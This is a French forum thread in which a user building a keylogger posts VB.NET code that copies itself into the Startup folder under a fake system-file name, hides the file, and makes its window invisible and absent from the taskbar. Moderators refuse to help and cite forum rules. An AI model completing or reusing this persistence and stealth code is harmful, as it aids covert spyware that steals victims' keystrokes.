Masquer copie du fichier original et lui attribuer l'opacité nulle

Résolu
SvenJashen - 18 oct. 2012 à 18:04
ucfoutu Messages postés 18038 Date d'inscription lundi 7 décembre 2009 Statut Modérateur Dernière intervention 11 avril 2018 - 18 oct. 2012 à 19:22
salut , je suis en train de faire un keylogger , et je voudrais que lors du chargement de l'application , celle ci verifie si elle n'a pas été copiée dans un dossier c: windows

si c'est pas le cas , alors elle se copie à cette adresse sous un autre nom.
Ensuite , si on clique sur la même application qui se trouve au dossier c:windows { sous un autre nom} , que ses propriété opacité soit = 0 et qu'elle ne s'affiche pas dans la liste des tâches

j'ai essayé ceci :
 If Not Exists("C:\Users" & Username & "\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System File [Not Delete].exe") Then
            File.Copy("prog.exe", "C:\Users" & Username & "\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System File [Not Delete].exe")
            File.SetAttributes("C:\Users" & Username & "\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System File [Not Delete].exe", FileAttribute.Hidden)
            

        End If
        If Me.Text = "System File [Not Delete].exe" Then
            Me.Opacity = 0
            Me.ShowInTaskbar = False
        End If


mais sa ne passe pas , quand je lance ce code , la première application{ original} n'apparait plus
comment dois je procéder ?

2 réponses

NHenry Messages postés 15117 Date d'inscription vendredi 14 mars 2003 Statut Modérateur Dernière intervention 10 mai 2024 159
18 oct. 2012 à 19:04
Bonjour,

Penses à lire le règlement CS, surtout le point :
On ne pose pas de question en rapport avec virus, crack, hack, trojan etc... ainsi que TOUS sujets comportant ou faisant référence directement ou indirectement à la religion, la politique ou le sexe.


Tu es là depuis trop peu de temps pour avoir la confiance des membres du forum.

---------------------------------------------------------------------
[list=ordered][*]Pour poser correctement une question et optimiser vos chances d'obtenir des réponses, pensez à lire le règlement CS, celui-ci pour bien poser votre question ou encore celui-ci pour les PFE et autres exercices.[*]Quand vous postez un code, merci d'utiliser la coloration syntaxique (3ième icône en partant de la droite : ).[*]En VB.NET pensez à activer Option Explicit et Option Strict (propriété du projet) et à retirer l'import automatique de l'espace de nom Microsoft.VisualBasic (onglet Références dans les propriétés du projet).[*]Si votre problème est résolu (et uniquement si c'est le cas), pensez à mettre "Réponse acceptée" sur le ou les messages qui vous ont aidés/list
---
Mon site
3
ucfoutu Messages postés 18038 Date d'inscription lundi 7 décembre 2009 Statut Modérateur Dernière intervention 11 avril 2018 211
18 oct. 2012 à 19:22
La conjugaison d'un Keylogger et d'une fenêtre à la fois invisible et n'apparaissant pas dans le gestionnaire des tâches n'est en effet pas faire pour rassurer (c'est le moins que l'on puisse dire )


________________________
Réponse exacte ? => "REPONSE ACCEPTEE" pour faciliter les recherches.
Pas d'aide en ligne installée ? => ne comptez pas sur moi pour simplement vous dire ce qu'elle contient. Je n'interviendrai qu'en cas de nécessité de développ
0
Rejoignez-nous